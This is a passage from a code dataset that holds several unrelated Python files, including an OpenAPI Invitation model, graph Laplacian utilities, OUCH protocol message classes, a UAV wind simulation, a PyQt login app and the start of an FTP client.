E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._id = None\n self._client_id = None\n self._redirect_uri = None\n self._cloud_name = None\n self._cloud_role = None\n self._project_name = None\n self._project_role = None\n self._email = None\n self._status = None\n self._sender_provider_sub = None\n self.discriminator = None\n\n if id is not None:\n self.id = id\n if client_id is not None:\n self.client_id = client_id\n self.redirect_uri = redirect_uri\n self.cloud_name = cloud_name\n self.cloud_role = cloud_role\n if project_name is not None:\n self.project_name = project_name\n self.project_role = project_role\n self.email = email\n if status is not None:\n self.status = status\n if sender_provider_sub is not None:\n self.sender_provider_sub = sender_provider_sub\n\n @property\n def id(self):\n \"\"\"Gets the id of this Invitation. # noqa: E501\n\n\n :return: The id of this Invitation. # noqa: E501\n :rtype: int\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this Invitation.\n\n\n :param id: The id of this Invitation. # noqa: E501\n :type: int\n \"\"\"\n\n self._id = id\n\n @property\n def client_id(self):\n \"\"\"Gets the client_id of this Invitation. # noqa: E501\n\n\n :return: The client_id of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._client_id\n\n @client_id.setter\n def client_id(self, client_id):\n \"\"\"Sets the client_id of this Invitation.\n\n\n :param client_id: The client_id of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n\n self._client_id = client_id\n\n @property\n def redirect_uri(self):\n \"\"\"Gets the redirect_uri of this Invitation. # noqa: E501\n\n User will be redirected to this uri when they accept the invitation # noqa: E501\n\n :return: The redirect_uri of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._redirect_uri\n\n @redirect_uri.setter\n def redirect_uri(self, redirect_uri):\n \"\"\"Sets the redirect_uri of this Invitation.\n\n User will be redirected to this uri when they accept the invitation # noqa: E501\n\n :param redirect_uri: The redirect_uri of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and redirect_uri is None: # noqa: E501\n raise ValueError(\"Invalid value for `redirect_uri`, must not be `None`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n redirect_uri is not None and len(redirect_uri) > 512):\n raise ValueError(\"Invalid value for `redirect_uri`, length must be less than or equal to `512`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n redirect_uri is not None and len(redirect_uri) < 1):\n raise ValueError(\"Invalid value for `redirect_uri`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._redirect_uri = redirect_uri\n\n @property\n def cloud_name(self):\n \"\"\"Gets the cloud_name of this Invitation. # noqa: E501\n\n\n :return: The cloud_name of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._cloud_name\n\n @cloud_name.setter\n def cloud_name(self, cloud_name):\n \"\"\"Sets the cloud_name of this Invitation.\n\n\n :param cloud_name: The cloud_name of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and cloud_name is None: # noqa: E501\n raise ValueError(\"Invalid value for `cloud_name`, must not be `None`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n cloud_name is not None and len(cloud_name) < 1):\n raise ValueError(\"Invalid value for `cloud_name`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._cloud_name = cloud_name\n\n @property\n def cloud_role(self):\n \"\"\"Gets the cloud_role of this Invitation. # noqa: E501\n\n Role the user will have when they accept the invitation # noqa: E501\n\n :return: The cloud_role of this Invitation. # noqa: E501\n :rtype: int\n \"\"\"\n return self._cloud_role\n\n @cloud_role.setter\n def cloud_role(self, cloud_role):\n \"\"\"Sets the cloud_role of this Invitation.\n\n Role the user will have when they accept the invitation # noqa: E501\n\n :param cloud_role: The cloud_role of this Invitation. # noqa: E501\n :type: int\n \"\"\"\n if self.local_vars_configuration.client_side_validation and cloud_role is None: # noqa: E501\n raise ValueError(\"Invalid value for `cloud_role`, must not be `None`\") # noqa: E501\n\n self._cloud_role = cloud_role\n\n @property\n def project_name(self):\n \"\"\"Gets the project_name of this Invitation. # noqa: E501\n\n\n :return: The project_name of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._project_name\n\n @project_name.setter\n def project_name(self, project_name):\n \"\"\"Sets the project_name of this Invitation.\n\n\n :param project_name: The project_name of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n project_name is not None and len(project_name) < 1):\n raise ValueError(\"Invalid value for `project_name`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._project_name = project_name\n\n @property\n def project_role(self):\n \"\"\"Gets the project_role of this Invitation. # noqa: E501\n\n Role the user will have when they accept the invitation # noqa: E501\n\n :return: The project_role of this Invitation. # noqa: E501\n :rtype: int\n \"\"\"\n return self._project_role\n\n @project_role.setter\n def project_role(self, project_role):\n \"\"\"Sets the project_role of this Invitation.\n\n Role the user will have when they accept the invitation # noqa: E501\n\n :param project_role: The project_role of this Invitation. # noqa: E501\n :type: int\n \"\"\"\n\n self._project_role = project_role\n\n @property\n def email(self):\n \"\"\"Gets the email of this Invitation. # noqa: E501\n\n email of the user to invite # noqa: E501\n\n :return: The email of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._email\n\n @email.setter\n def email(self, email):\n \"\"\"Sets the email of this Invitation.\n\n email of the user to invite # noqa: E501\n\n :param email: The email of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n if self.local_vars_configuration.client_side_validation and email is None: # noqa: E501\n raise ValueError(\"Invalid value for `email`, must not be `None`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n email is not None and len(email) > 256):\n raise ValueError(\"Invalid value for `email`, length must be less than or equal to `256`\") # noqa: E501\n if (self.local_vars_configuration.client_side_validation and\n email is not None and len(email) < 1):\n raise ValueError(\"Invalid value for `email`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._email = email\n\n @property\n def status(self):\n \"\"\"Gets the status of this Invitation. # noqa: E501\n\n A: Accepted D: Denied P: Pending # noqa: E501\n\n :return: The status of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status):\n \"\"\"Sets the status of this Invitation.\n\n A: Accepted D: Denied P: Pending # noqa: E501\n\n :param status: The status of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n allowed_values = [\"A\", \"D\", \"P\"] # noqa: E501\n if self.local_vars_configuration.client_side_validation and status not in allowed_values: # noqa: E501\n raise ValueError(\n \"Invalid value for `status` ({0}), must be one of {1}\" # noqa: E501\n .format(status, allowed_values)\n )\n\n self._status = status\n\n @property\n def sender_provider_sub(self):\n \"\"\"Gets the sender_provider_sub of this Invitation. # noqa: E501\n\n OIDC sub of the sender. The original sub from the provider is used instead of the broker sub # noqa: E501\n\n :return: The sender_provider_sub of this Invitation. # noqa: E501\n :rtype: str\n \"\"\"\n return self._sender_provider_sub\n\n @sender_provider_sub.setter\n def sender_provider_sub(self, sender_provider_sub):\n \"\"\"Sets the sender_provider_sub of this Invitation.\n\n OIDC sub of the sender. The original sub from the provider is used instead of the broker sub # noqa: E501\n\n :param sender_provider_sub: The sender_provider_sub of this Invitation. # noqa: E501\n :type: str\n \"\"\"\n if (self.local_vars_configuration.client_side_validation and\n sender_provider_sub is not None and len(sender_provider_sub) < 1):\n raise ValueError(\"Invalid value for `sender_provider_sub`, length must be greater than or equal to `1`\") # noqa: E501\n\n self._sender_provider_sub = sender_provider_sub\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Invitation):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, Invitation):\n return True\n\n return self.to_dict() != other.to_dict()\n","sub_path":"bimdata_api_client/models/invitation.py","file_name":"invitation.py","file_ext":"py","file_size_in_byte":13317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"221962147","text":"'''\nModule to calculate local distance matrix and weighted graph Laplacian\n\n'''\nimport numpy as np\nimport cv2\nfrom scipy.spatial.distance import pdist, squareform\nfrom numpy.matlib import repmat\nimport timeit\ndef local_dist_mat(x,k,metric='euclidean',grounddist=0,iteration=0):\n# local_dist_mat: Calculates the knn - local distance matrix based on parameter k\n\n n_samples,n_dim = x.shape\n ixx = np.linspace(0,n_samples-1,n_samples,dtype=int)\n ixx = repmat(ixx,k,1)\n \n # check wich metric to be calculated\n if metric == 'emd':\n x = np.float32(x)\n grounddist = np.float32(grounddist)\n n_pdist = int(n_samples*(n_samples-1)/2) \n dist_vect = np.empty((n_pdist))\n idx = 0\n for j in range(n_samples-1):\n start = j+1\n for i in range(start,n_samples):\n print('Now calculating {} of {} at iteration {}'.format(idx+1,n_pdist,iteration+1))\n start = timeit.timeit()\n dist_vect[idx],_,_ = cv2.EMD(np.transpose(x[i,:]),np.transpose(x[j,:]),cv2.DIST_USER,cost=grounddist)\n end = timeit.timeit()\n print('time elaplsed: ', end-start)\n idx = idx+1\n else:\n dist_vect = pdist(x,metric)\n \n dist_mat = squareform(dist_vect) \n \n # calculate local dist matrix \n knn_mat = np.argsort(dist_mat,axis=0) \n knn_mat = knn_mat[1:k+1,:] # only first k elements (without the zeros)\n knn_dist_mat = np.zeros((k,n_samples))\n for j in range(n_samples):\n for i in range(k):\n idx_row = knn_mat[i,j]\n idx_col = j\n knn_dist_mat[i,j] = dist_mat[idx_row,idx_col]\n\n dist_mat_local = np.zeros((n_samples,n_samples))\n for j in range(n_samples):\n for i in range(k):\n idx_row = knn_mat[i,j]\n idx_col = ixx[i,j]\n dist_mat_local[idx_row,idx_col] = knn_dist_mat[i,j]\n\n dist_mat_local = np.maximum(dist_mat_local,np.transpose(dist_mat_local)) # symmetrize\n\n return dist_mat_local\n\n\n\ndef weighted_graph_laplacian(dist_mat):\n# local_graph_laplacian: Calculates the weighted graph laplacian of a distance matrix\n n = dist_mat.shape[0]\n d = np.sum(dist_mat,axis=1) # sum up rows (-->)\n if len(d[d==0]) > 0:\n i_zeros = np.where(d==0)\n d[i_zeros] = 1\n D = np.diag(1/d) # Degree Matrix\n A = 1/n * np.matmul(np.matmul(D,dist_mat),D) # weighted Adjacency matrix\n d = np.sum(A,axis=1) # sum up rows (-->)\n if len(d[d==0]) > 0:\n i_zeros = np.where(d==0)\n d[i_zeros] = 1/n\n D = np.diag(d) # Degree Matrix of weighted A\n\n L = D-A # Graph Laplacian\n\n return L","sub_path":"Anomaly_Detection_Py/Diffusion_Fct.py","file_name":"Diffusion_Fct.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"477247732","text":"#!/usr/bin/python3\n\"\"\"Base Model\"\"\"\n\nimport json\nimport models\nimport uuid\nfrom datetime import datetime\n\ncronos = '%Y-%m-%dT%H:%M:%S.%f'\n\n\nclass BaseModel:\n \"\"\"BaseModel for other classes\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"public instance attr\"\"\"\n if kwargs:\n self.__dict__ = kwargs\n if \"created_at\" in kwargs:\n self.created_at = datetime.strptime(kwargs.get(\"created_at\"),\n cronos)\n if \"updated_at\" in kwargs:\n self.updated_at = datetime.strptime(kwargs.get(\"updated_at\"),\n cronos)\n else:\n self.id = str(uuid.uuid4())\n self.created_at = datetime.now()\n models.storage.new(self)\n\n def __str__(self):\n \"\"\"String rep of the BaseModel\"\"\"\n return \"[{:s}] ({:s}) {}\".format(self.__class__.__name__,\n self.id, self.__dict__)\n\n def save(self):\n \"\"\"updates the attr updated_at\"\"\"\n self.updated_at = datetime.now()\n models.storage.save()\n\n def to_dict(self):\n \"\"\"returns a dictionary with created_at and updated_at\"\"\"\n s_dict = self.__dict__.copy()\n s_dict[\"__class__\"] = type(self).__name__\n for key, value in s_dict.items():\n if isinstance(value, datetime):\n s_dict[key] = value.strftime(cronos)\n return s_dict\n","sub_path":"models/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"151844476","text":"import dpkt\n\n\n#Upstream messages\nACCEPTED='A'\nCANCELED='C'\nEXECUTED='E'\n\n#Downstream messages\nENTER_ORDER='O'\nCANCEL_ORDER='X'\n\n\nclass EnterOrder(dpkt.Packet):\n \"\"\"OUCH Enter order message\"\"\"\n __hdr__ = (('ordertoken', '14s', ''),\n ('side', 'c', 0),\n ('shares', 'I', 0),\n ('stock', '8s', ''),\n ('price', 'I', 0),\n ('tif', 'I', 0),\n ('firm', '4s', 0),\n ('display', 'c', 0),\n ('capacity', 'c', 0),\n ('iso', 'c', 0),\n ('minqty', 'I', 0),\n ('crosstype', 'c', 0),\n ('customertype', 'c', 0))\n\n\nclass CancelOrder(dpkt.Packet):\n \"\"\"OUCH Cancel order message\"\"\"\n __hdr__ = (('ordertoken', '14s', ''),\n ('shares', 'I', 0))\n\n\nclass Accepted(dpkt.Packet):\n \"\"\"OUCH Accepted message\"\"\"\n __hdr__ = (('timestamp', 'Q', 0),\n ('ordertoken', '14s', ''),\n ('side', 'c', 0),\n ('shares', 'I', 0),\n ('stock', '8s', ''),\n ('price', 'I', 0),\n ('tif', 'I', 0),\n ('firm', '4s', 0),\n ('display', 'c', 0),\n ('orderrefnum', 'Q', 0),\n ('capacity', 'c', 0),\n ('iso', 'c', 0),\n ('minqty', 'I', 0),\n ('crosstype', 'c', 0),\n ('orderstate', 'c', 0),\n ('bboweightind', 'c', 0))\n\n \nclass Canceled(dpkt.Packet):\n \"\"\"OUCH Canceled message\"\"\"\n __hdr__ = (('timestamp', 'Q', 0),\n ('ordertoken', '14s', ''),\n ('decshares', 'I', 0),\n ('reason', 'c', 0))\n\n\nclass Executed(dpkt.Packet):\n \"\"\"OUCH Canceled message\"\"\"\n __hdr__ = (('timestamp', 'Q', 0),\n ('ordertoken', '14s', ''),\n ('execshares', 'I', 0),\n ('execprice', 'I', 0),\n ('liquidityflag', 'c', 0),\n ('matchnumber', 'Q', 0))\n","sub_path":"ouch42.py","file_name":"ouch42.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"523398184","text":"import re\n\n# любой символ\ns = 'Почта разработчиков develop@mail.ru, а почта поддержки support@ya.ru.'\n\nr = re.search(r'\\w+@[A-z0-9-]+\\.[A-z0-9-]+', s)\nprint(r.group())\n\nf = re.findall(r'\\w+@[A-z0-9-]+\\.[A-z0-9-]+', s)\nprint(f)\n\n# Найдем только имя пользователя почты\nr = re.search(r'(\\w+)@([A-z0-9-]+\\.[A-z0-9-]+)', s)\nprint(r.group(1))\n\nr = re.findall(r'(\\w+)@([A-z0-9-]+\\.[A-z0-9-]+)', s)\nprint(r)\n\n# Замена с помощью регулярки\nr = re.sub(r'(\\w+)@([A-z0-9-]+\\.[A-z0-9-]+)', r'xxx@\\2', s)\nprint(r)\n\nf = 'y = -1x + 2'\nr = re.findall(r'y\\s*=\\s*([\\d+-]+)x\\s*([+-])\\s*([\\d])', f)\n\nprint(r)","sub_path":"re_libruary.py","file_name":"re_libruary.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"173956743","text":"\"\"\"\nClass to determine wind velocity at any given moment,\ncalculates a steady wind speed and uses a stochastic\nprocess to represent wind gusts. (Follows section 4.4 in uav book)\n\"\"\"\nimport sys\nsys.path.append('..')\nfrom tools.transfer_function import transferFunction\nfrom tools.rotations import Euler2Rotation2\nimport parameters.aerosonde_parameters as MAV\n#import parameters.simulation_parameters as SIM\nfrom math import sqrt\nimport numpy as np\n\n\nclass windSimulation:\n def __init__(self, Ts):\n # steady state wind defined in the inertial frame\n self._steady_state = np.array([[0., 0., 0.]]).T\n # Gust model parameters from table 4.1\n L_u = 200\n L_v = 200\n L_w = 50\n sigma_u = 1.06\n sigma_v = 1.06\n sigma_w = 0.7\n Va0 = MAV.Va0 # Reference value for airspeed\n self.u_w_g = transferFunction(sigma_u * sqrt(2 * Va0 / L_u) ** np.array([[1]]), sigma_u * sqrt(2 * Va0 / L_u) * np.array([[1, Va0 / L_u]]), Ts)\n self.v_w_g = transferFunction(sigma_v * sqrt(3 * Va0 / L_v) ** np.array([[1, Va0 / (sqrt(3) * L_v)]]), sigma_v * sqrt(3 * Va0 / L_v) ** np.array([[1, 2 * Va0 / L_v, (Va0 / L_v)**2]]), Ts)\n self.w_w_g = transferFunction(sigma_w * sqrt(3 * Va0 / L_w) * np.array([[1, Va0 / (sqrt(3) * L_w)]]), sigma_w * sqrt(3 * Va0 / L_w) * np.array([[1, 2 * Va0 / L_w, (Va0 / L_w)**2]]), Ts)\n self._Ts = Ts\n\n def update(self):\n # returns a six vector.\n # The first three elements are the steady state wind in the inertial frame\n # The second three elements are the gust in the body frame\n gust = np.array([[self.u_w_g.update(np.random.randn())],\n [self.v_w_g.update(np.random.randn())],\n [self.w_w_g.update(np.random.randn())]])\n #gust = np.array([[0.],[0.],[0.]])\n return np.concatenate((self._steady_state, gust))\n","sub_path":"simulation_py/dynamics/wind_simulation.py","file_name":"wind_simulation.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"147396801","text":"import uuid\nfrom models.database import Database\nfrom models.post import Post\n\nclass Blog(object):\n def __init__(self,author,title,description,id=None):\n self.id = uuid.uuid4().hex if id is None else id\n self.author = author\n self.title = title\n self.description = description\n\n def new_post(self):\n title = input(\"What is the title of your post? \")\n body = input(\"Body: \")\n post = Post(blog_id=self.id,title=title,body=body,author=self.author)\n post.save_to_mongo()\n\n def get_posts(self):\n return Post.get_from_blog(self.id)\n \n def save_to_mongo(self):\n Database.insert(collection='blogs', data=self.json())\n\n def json(self):\n return {\n 'author':self.author,\n 'title':self.title,\n 'description':self.description,\n 'id':self.id\n }\n \n @classmethod\n def get_from_mongo(cls,id):\n blog_data = Database.find_one(collection=\"blogs\",query={\"id\":id})\n print(blog_data[\"id\"])\n return cls(author=blog_data[\"author\"],title=blog_data[\"title\"],description=blog_data[\"description\"],id=blog_data[\"id\"])\n","sub_path":"blog_app/models/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"463508607","text":"import sys\nsys.path.append('/home/danielle8farias/hello-world-python3/meus_modulos')\nfrom mensagem import ler_cabecalho\n\nfrom matrizes.ordem_matriz import linha_coluna\nfrom matrizes.construcao_matriz import construir_matriz\nfrom matrizes.impressao_matriz import imprimir_matriz\n\nfrom time import sleep\n\n\n#efetuando a soma das matrizes\ndef efetuar_soma_matrizes (A, B):\n num_linhas = len(A)\n num_colunas = len(A[0]) #basta colocar o comprimento de uma das linhas de A\n soma = []\n for i in range(num_linhas):\n linha = []\n for j in range(num_colunas):\n valor_soma = (A[i][j] + B[i][j])\n linha.append(valor_soma)\n soma.append(linha)\n return soma\n\n\n#chamada principal da soma de matrizes\ndef somar_matrizes():\n ler_cabecalho('soma duas matrizes')\n #definindo a ordem das matrizes \n print('Matriz A')\n Ai, Aj = linha_coluna()\n print()\n print('Matriz B')\n Bi, Bj = linha_coluna()\n print()\n #verificando se são de mesma ordem\n if Ai == Bi and Aj == Bj:\n #construindo as matrizes\n print('Construindo matriz A')\n A = construir_matriz(Ai, Aj)\n print('\\nConstruindo matriz B')\n B = construir_matriz(Bi, Bj)\n print()\n #imprimindo as matrizes\n sleep(0.5)\n print('Matriz A:')\n imprimir_matriz(A, Ai, Aj)\n print()\n sleep(0.5)\n print('Matriz B:')\n imprimir_matriz(B, Bi, Bj)\n print()\n resultado = efetuar_soma_matrizes(A, B)\n #imprimindo a soma\n sleep(0.5)\n print('\\nResultado da soma:')\n imprimir_matriz(resultado, Ai, Aj)\n else:\n print('Não é possível somar: As matrizes devem ser de mesma ordem.')\n sleep(0.5)\n print()\n","sub_path":"calculadora_py/matrizes/soma_matriz.py","file_name":"soma_matriz.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"570522227","text":"from __future__ import annotations\nimport collections\nimport random\nimport heapq\nfrom tracemalloc import start\n\n\"\"\"\nSuccess\nDetails \nRuntime: 70 ms, faster than 26.70% of Python3 online submissions for Restore IP Addresses.\nMemory Usage: 13.9 MB, less than 82.80% of Python3 online submissions for Restore IP Addresses.\n\"\"\"\nclass Solution:\n def restoreIpAddresses(self, s: str) -> List[str]:\n n = len(s)\n ret = []\n def rec(start_i, curr_ip):\n if len(curr_ip) == 4:\n # index valid?\n if start_i == n:\n ret.append('.'.join(curr_ip))\n return\n # branching\n min_len = 4 - len(curr_ip)\n max_len = min_len * 3\n if n - start_i < min_len:\n return\n if n - start_i > max_len:\n return\n # bt\n if start_i + 1 <= n and self.is_valid(s[start_i]):\n rec(start_i+1, curr_ip+[s[start_i]])\n if start_i + 2 <= n and self.is_valid(s[start_i:start_i+2]):\n rec(start_i+2, curr_ip+[s[start_i:start_i+2]])\n if start_i + 3 <= n and self.is_valid(s[start_i:start_i+3]):\n rec(start_i+3, curr_ip+[s[start_i:start_i+3]])\n rec(0, [])\n return ret\n def is_valid(self, i):\n # 1 to 3 digit\n if len(i) == 1:\n return True\n if len(i) == 2:\n return i[0] != '0'\n # below are len == 3\n if i[0] == '1':\n return True\n if i[0] == '2':\n if i[1] == '0' or i[1] == '1' or i[1] == '2' or i[1] == '3' or i[1] == '4':\n return True\n elif i[1] == '5':\n return i[2] == '0' or i[2] == '1' or i[2] == '2' or i[2] == '3' or i[2] == '4' or i[2] == '5'\n return False\n\nsol = Solution()\nfor i in range(256):\n assert sol.is_valid(str(i)), i\n\nassert not sol.is_valid('256')\nassert not sol.is_valid('01')\nassert not sol.is_valid('001')\nassert not sol.is_valid('300')\n\nprint(sol.restoreIpAddresses('1111'))\n\n# dfs solve\n","sub_path":"M_93_restoreIpAddresses.py","file_name":"M_93_restoreIpAddresses.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"10464791","text":"import sys\r\nfrom PyQt5 import QtWidgets,QtCore,uic,QtGui\r\nfrom PyQt5.QtWidgets import QWidget,QLabel\r\nfrom PyQt5.QtGui import QMovie\r\nfrom PyQt5.QtCore import QCoreApplication,pyqtSignal, pyqtSlot,Qt,QTimer\r\nfrom PyQt5.uic import loadUi\r\nfrom register import *\r\nfrom main import MainWindow\r\nfrom login import *\r\nfrom icecream import install\r\ninstall()\r\nclass LoadingScreen(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.setFixedSize(400,300)\r\n self.setWindowFlags(Qt.WindowStaysOnTopHint)\r\n self.label_animation=QLabel(self)\r\n self.movie=QMovie(\"images/loading.gif\")\r\n self.label_animation.setMovie(self.movie)\r\n timer=QTimer(self)\r\n timer.singleShot(3000,self.stopAnimation)\r\n self.startAnimation()\r\n def startAnimation(self):\r\n self.movie.start()\r\n self.show()\r\n def stopAnimation(self):\r\n self.movie.stop()\r\n self.close()\r\nclass Controller():\r\n finished=pyqtSignal()\r\n def __init__(self, *arg, **kwargs):\r\n super().__init__(*arg,**kwargs)\r\n self.window=Start(windowTitle='Choose')\r\n def show_start(self):\r\n self.window.rw.connect(self.show_register)\r\n self.window.mw.connect(self.show_main)\r\n self.window.show()\r\n def show_register(self):\r\n self.reg = Register()\r\n self.reg.sw.connect(self.start2)\r\n self.window.close()\r\n self.reg.show()\r\n def show_main(self,str):\r\n self.window.close()\r\n self.main=MainWindow(str)\r\n self.main.lw.connect(self.signout)\r\n self.main.setWindowTitle(f\"Welcome {str}\")\r\n self.main.show()\r\n def load(self):\r\n self.L=LoadingScreen()\r\n def start2(self):\r\n self.reg.close()\r\n self.window=Start(windowTitle='Choose')\r\n self.window.rw.connect(self.show_register)\r\n self.window.mw.connect(self.show_main)\r\n self.window.show()\r\n def signout(self):\r\n self.main.close()\r\n self.window=Start(windowTitle='Choose')\r\n self.window.rw.connect(self.show_register)\r\n self.window.mw.connect(self.show_main)\r\n self.window.show()\r\n \r\ndef main():\r\n app = QtWidgets.QApplication(sys.argv)\r\n w=Controller()\r\n w.show_start()\r\n sys.exit(app.exec_())\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"198431546","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# 测试类\n# 参考地址 https://github.com/hanandjun/weifangbus/blob/develop/lib/utils/requestParamsUtil.dart\nimport time\nimport random\nimport hashlib\nimport hmac\nimport base64\n\n# 59485eebe12042cba33e972f77834b6b 聊城\n# 55b73c446e914785862966abf9a29416 潍坊\napp_key = \"55b73c446e914785862966abf9a29416\"\n\n\n# 获取时间戳\ndef _get_time_stamp():\n str_time = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n return str_time\n\n\n# 获取随机数 100-1000\ndef _get_random():\n return random.randint(100, 1000)\n\n\n# 生成签名密钥\ndef _get_sign_key(time_stamp, rand):\n message = bytes(str(time_stamp) + str(rand), encoding=\"utf-8\")\n secret = bytes(app_key, \"utf-8\")\n signature = base64.b64encode(hmac.new(secret, message, digestmod=hashlib.sha256).digest())\n print(signature)\n\n\nif __name__ == '__main__':\n time_stamp = _get_time_stamp()\n rand = _get_random()\n _get_sign_key(time_stamp, rand)\n","sub_path":"SmallDemo/demo/weiFangBus/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"5282554","text":"\nimport socket\nimport json,hashlib,time\nimport os\nimport sys\nimport threading\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\n\nfrom conf import settings\n\n'''\n仅用于测试进度条是否可用。\n兼做测试断点续传。\n'''\n\nuser_data = {\n 'account_id':None,\n 'is_authenticated':False,\n 'current_dir':None,\n 'account_data':None\n}\n\n\ndef view_bar(num, total): # 显示进度条\n rate = num / total\n rate_num = int(rate * 100)\n number = int(50 * rate)\n r = '\\r[%s%s]%d%%' % (\"#\" * number, \" \" * (50 - number), rate_num,)\n # print(\"\\r {}\".format(r), end=\" \") # \\r回到行的开头\n print(\" {}\".format(r), end=\" \") # \\r回到行的开头\n\n\n\n\nclass FtpClient(object):\n def __init__(self):\n self.client = socket.socket()\n def help(self):\n msg = '''\n ls\n lls\n pwd\n cd ../..\n get filename\n put filename\n mkdir dirname\n bye\n '''\n print(msg)\n def connect(self,ip,port):\n self.client.connect((ip, port))\n\n def authenticate(self):\n self.account = input(\"\\033[32;1maccount:\\033[0m\").strip() # 用户的账户名\n password = input(\"\\033[32;1mpassword:\\033[0m\").strip() # 用户的密码\n msg_dic={\n 'action':'auth',\n 'username':self.account,\n 'password':password\n }\n self.client.send(json.dumps(msg_dic).encode(\"utf-8\"))\n print(\"send\", json.dumps(msg_dic).encode(\"utf-8\"))\n server_response = self.client.recv(1024)\n res_dic = json.loads(server_response.decode())\n return res_dic\n\n\n\n\n def interactive(self):\n retry_count = 0\n while user_data['is_authenticated'] is not True and retry_count < 3:\n auth=self.authenticate()\n if auth['res_type']==0:\n user_data['is_authenticated'] = True\n user_data['account_id'] = auth['res_data']['id']\n user_data['account_data'] = auth['res_data']\n user_data['current_dir'] = auth['res_data']['home_dir']\n break\n elif auth['res_type']==1:\n print(auth['res_data'])\n elif auth['res_type'] == 2:\n print(auth['res_data'])\n retry_count+=1\n else:\n print(\"账号:{},尝试登陆的次数过多!\".format(self.account))\n exit()\n\n print(\"{}用户,你好,欢迎进入Crazy FTP service,请输入你的命令。。\".format(user_data['account_id']))\n\n while user_data['is_authenticated'] is True:\n\n cmd = input(\"[{}/]>>\".format(user_data['current_dir'])).strip()\n if len(cmd) ==0:continue\n cmd_str = cmd.split()[0]\n if hasattr(self,\"cmd_%s\" % cmd_str):\n func = getattr(self,\"cmd_%s\" % cmd_str)\n func(cmd)\n else:\n self.help()\n\n def cmd_ls(self,*args):\n cmd_split = args[0].split()\n if len(cmd_split) > 1:\n dirname = user_data['current_dir']+'/'+cmd_split[1]\n else:\n dirname = user_data['current_dir']\n msg_dic={\n \"action\": \"ls\",\n \"dirname\":dirname\n }\n self.client.send(json.dumps(msg_dic).encode(\"utf-8\"))\n print(\"send\", json.dumps(msg_dic).encode(\"utf-8\"))\n cmd_res_size = self.client.recv(1024) ##接受命令结果的长度\n # print(\"命令结果大小:\", cmd_res_size)\n received_size = 0\n received_data = b''\n while received_size < int(cmd_res_size.decode()):\n data = 